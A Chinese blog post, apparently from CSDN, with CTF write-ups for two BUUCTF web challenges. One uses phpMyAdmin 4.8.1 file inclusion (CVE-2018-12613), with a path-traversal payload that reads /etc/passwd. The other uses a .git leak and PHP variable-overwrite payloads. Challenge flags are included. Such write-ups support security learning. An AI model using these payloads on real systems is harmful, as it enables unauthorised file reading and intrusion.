BUUCTF 我有一个数据库 Mark loves cat

于 2023-04-03 18:53:49 发布
阅读量191 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwyyyrre/article/details/129933037
版权

我有一个数据库

打开图片是乱码 源代码也没有任何的东西 扫描一下后台

扫到了3个东西

第一个页面显示

第二个是一个数据库

这个是4.8.1版本的数据库有漏洞可以利用(CVE-2018-12613)

知道这一点就可以直接在百度找他的payload

index.php?target=db_sql.php%3f/../../../../../../../../etc/passwd

 

有回显 直接查flag

 flag{e2922980-02d5-4351-82df-b38c10e0456f}

Mark loves cat

打开链接 没看到有用的信息 查看源代码也没有什么信息 尝试扫一下后台

扫到了git泄露

直接GitHack下载源码

下载完成 查看一下源码 还有一个flag.php 

分析一下

<?php

include 'flag.php';

$yds = "dog";
$is = "cat";
$handsome = 'yds';

foreach($_POST as $x => $y){
    $$x = $y;      这一块的意思是 post传参 输入$x=$y 回显就是$$x=$y
}

foreach($_GET as $x => $y){
    $$x = $$y;    这一块的意思是 get传参 输入$x=$y 回显是$$x=$$y
}

foreach($_GET as $x => $y){
    if($_GET['flag'] === $x && $x !== 'flag'){
        exit($handsome);
    }
}

if(!isset($_GET['flag']) && !isset($_POST['flag'])){
    exit($yds);
}

if($_POST['flag'] === 'flag'  || $_GET['flag'] === 'flag'){
    exit($is);
}

echo "the flag is: ".$flag;

 

 这道题自己解不出来 看了好几个大佬的wp 才知道这种绕过可以用变量覆盖

这里利用的就是exit函数里面的三个 handsome yds is来绕过

利用 handsome

payload:?handsome=flag&flag=x&x=flag

 

利用yds

/?yds=flag

利用is

/?is=flag&flag=flag

新学到的东西就是变量覆盖漏洞

得到flag flag{4281d569-f7c1-4095-91cf-975c2e8a9a2d}

 

 

 

 

 

 

 

呕...
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF- 我有一个数据库
qq_45393916的博客
03-03 3891
BUUCTF--我有一个数据库(靶场思路)
buuctf 我有一个数据库
ANYOUZHEN的博客
06-03 310
打开题目,出现了一堆乱码也没啥可以传参的,开个dirsearch扫扫看看扫描目录发现发现其版本为phpmyadmin4.18,搜索相关版本的漏洞。 远程文件包含漏洞:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到恶意目的/etc/passwd被读取,说明文件包含漏洞存在 得到flag问题出在 之后phpadmin的开发团队考虑到了target后面加参数的情况,通过字符串分割将问号的前面部分取出,继续匹配白
Buuctf-我有一个数据库
bin789456的博客
11-28 2399
写在前面 从结果来看,这道题并不难,但是这个漏洞查找思想和poc查找思路很好,记下来。 WP
[BUUCTF刷题]我有一个数据库
weixin_43952190的博客
07-02 1201
我有一个数据库 cve-2018-12613-PhpMyadmin后台文件包含 进去后出现乱码的文字,扫描目录发现/phpmyadmin 发现其版本为phpmyadmin4.18,搜索相关版本的漏洞。 利用poc target=db_datadict.php%253f/../../../../../../../../flag 漏洞分析: 问题在index.php的55~63: // If we have a valid target, let's load that script instead
BUUCTF[GWCTF 2019]我有一个数据库
LSYZWF的博客
10-12 1747
文章目录题目解答漏洞分析知识点 题目 链接:https://buuoj.cn/challenges#[GWCTF%202019]%E6%88%91%E6%9C%89%E4%B8%80%E4%B8%AA%E6%95%B0%E6%8D%AE%E5%BA%93 解答 1、乱码,看不懂 2、F12 同时结合题目可能与数据库有关 3、可以尝试扫描相关数据库的端口是否开放,也可以通过数据库工具进行连接测试,但是这里使用的是phpmyadmin 随便翻阅了一下,得不到有用的东西,也证实了上面什么都没有的说法 4、从
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
在题目【BJDCTF2020]Mark loves cat】中,我们看到攻击者通过`.git`泄露获取到了网站的源码。通过运行`GitHack.py`脚本,他们找到了`flag.php`和`index.php`。在`index.php`中,代码检查了`GET`和`POST`中是否都有`...
realm-dart:领域是一个移动数据库
05-01
Realm是一个直接在手机,平板电脑或可穿戴设备内部运行的移动数据库。 该存储库包含Realm SDK for Flutter:trade_mark:和Dart:trade_mark:的源代码。 开发人员预览 此项目处于开发人员预览阶段,所有API可能会更改而...
Marky:一个降价教程和参考网站
06-09
除了作为交互式 Markdown 教程和参考网站之外,Marky 还提供了一个易于使用的 Markdown 游乐场,您可以在其中尝试并享受 Markdown 的乐趣。 Marky 仍在积极开发中,尚未准备好使用。 版权所有 :copyright: 2015 ...
markText安装包
最新发布
02-19
标题“markText安装包”所指的是一款名为markText的应用程序的安装文件,它是一个广受程序员喜爱的开源笔记软件。markText的主要特点是其简洁的用户界面和强大的Markdown支持,使得编写和预览代码注释变得既简单又...
marktext的中文包
07-21
2. **snapshot_blob.bin**: 这可能是V8引擎的另一个快照文件,与v8_context_snapshot.bin类似,用于存储预先编译的JavaScript代码,以提高程序启动速度和性能。 3. **icudtl.dat**: 这是International Components ...
BUUCTF WEB 我有一个数据库1
qq_41696858的博客
12-10 347
我也不知道咋回事,最近buuctf有些靶场的包一直抓不到,可能是我bp出问题了????? 抓包,打开靶场一堆乱码,bp抓包,发现原始回显是正常的,但也没有东西 直接扫目录,扫出来/phpmyadmin,最近buuctf防扫升级了,动不动就429,dirmap多扫几次吧,反正我扫了三四次。。。。 那就没什么好说的了,结合靶场给的提示,CVE-2018-12613 phpmyadmin在特定版本里有任意文件包含漏洞 想要搞清楚原理建议看看大佬的文章 https://www.xiinnn.com/article/
web buuctf [GWCTF 2019]我有一个数据库1
weixin_44214568的博客
03-26 3438
1.直接放弃御剑了,在buu上扫不到,我自己登录先看了一下有没有robots.txt,有,但是没有扫到,我用了disearch,设置了s之后可以扫到了 py dirsearch -u url -e * -s 1 扫描出来
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解)
小宇的web博客
02-12 594
buuctf-[[GWCTF 2019]我有一个数据库(小宇特详解) 这里不知道什么原因显示的乱码 直接使用dirsearch对网站进行扫描吧 这里扫到了phpmyadmin目录,无密码直接登录成功。 这里给出了版本号MySQL数据库Version 4.8.1。 这个版本有文件包含漏洞 漏洞原理是 利用/使db_datadict.php?成为一个不存在目录,利用include函数的目录不断跳转尝试得到flag目录。 payload phpmyadmin/index.php?target=db_datadi
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
网安小趴菜
09-20 611
BUUCTF Web [GWCTF 2019]我有一个数据库1 & [BJDCTF2020]Mark loves cat1
BUU [GWCTF 2019]我有一个数据库
cadandme的博客
05-11 206
刷了一道web题,记录做题过程。 打开页面看到 打开源码,尝试解码。试了UTF-8,尝试把得到的数据导成文档。 结果是乱码,走入了死胡同。数据库数据库,又想到扫描目录,在kali扫描,发现东西 先看txt, 再看phpinfo.php 到这里彻底不懂了,瞎搞了没看出东西后,看了大佬的wp,说是phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 后面跟着wp来,可惜在构造Pyaload使用时显示 index.php?target=db_sql.php%253f/
BUUCTF [GWCTF 2019] 我有一个数据库
Senimo
12-11 2148
BUUCTF [GWCTF 2019] 我有一个数据库 考点: 目录扫描 phpmyadmin 4.8.1 远程文件包含漏洞(CVE-2018-12613) 启动环境: 应该是为乱码,结合题目名,应该与数据库有关,寻找提示无果,使用dirsearch扫描后台: 扫描到如上页面,查看robots.txt: 查看phpinfo页面: dirsearch还扫描到存在phpmyadmin数据库管理页面,尝试访问: http://xxx/phpmyadmin/index.php 成功访问到: 查
BUUCTF WEB [GWCTF 2019]我有一个数据库
Y1da的博客
04-27 371
BUUCTF WEB [GWCTF 2019]我有一个数据库 刷新后查看响应包 <!DOCTYPE html> <html> <head> <title>空的数据库</title> </head> <body> <h1>我有一个数据库,但里面什么也没有~</h1> <h1>不信你找</h1> </body> </html> 没有什么其他
[GWCTF 2019]我有一个数据库&CVE-2018-12613
qq_43801002的博客
04-27 749
#两道题用的都是]CVE-2018-12613这一个洞,所以就给写一起了。 1.审下源码吧 问题在index.php的55~63: // If we have a valid target, let's load that script instead if (! empty($_REQUEST['target']) && is_string($_REQUEST['targ...
BUUCTF】[GWCTF 2019]我有一个数据库
aoao331198的博客
04-24 1064
还以为是电脑出问题了。。。 没啥东西就用dirsearch扫描,扫描出来有PHPmyadmin 关于phpmyadmin 4.8.1的漏洞问题,移步这里(CVE-2018-12613)phpmyadmin 4.8.1 这道题最终完整payload phpmyadmin/?target=db_datadict.php%253f/../../../../../../../../flag ......
opencvsharp 一个mark点 Mat
06-07
在OpenCvSharp中,Mark点可以通过绘制一个圆来实现。具体步骤如下: 1. 首先,需要创建一个Mat对象,可以通过以下方式创建: ``` Mat image = new Mat("path/to/image.jpg", ImreadModes.Color); ``` 2. 接下来,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值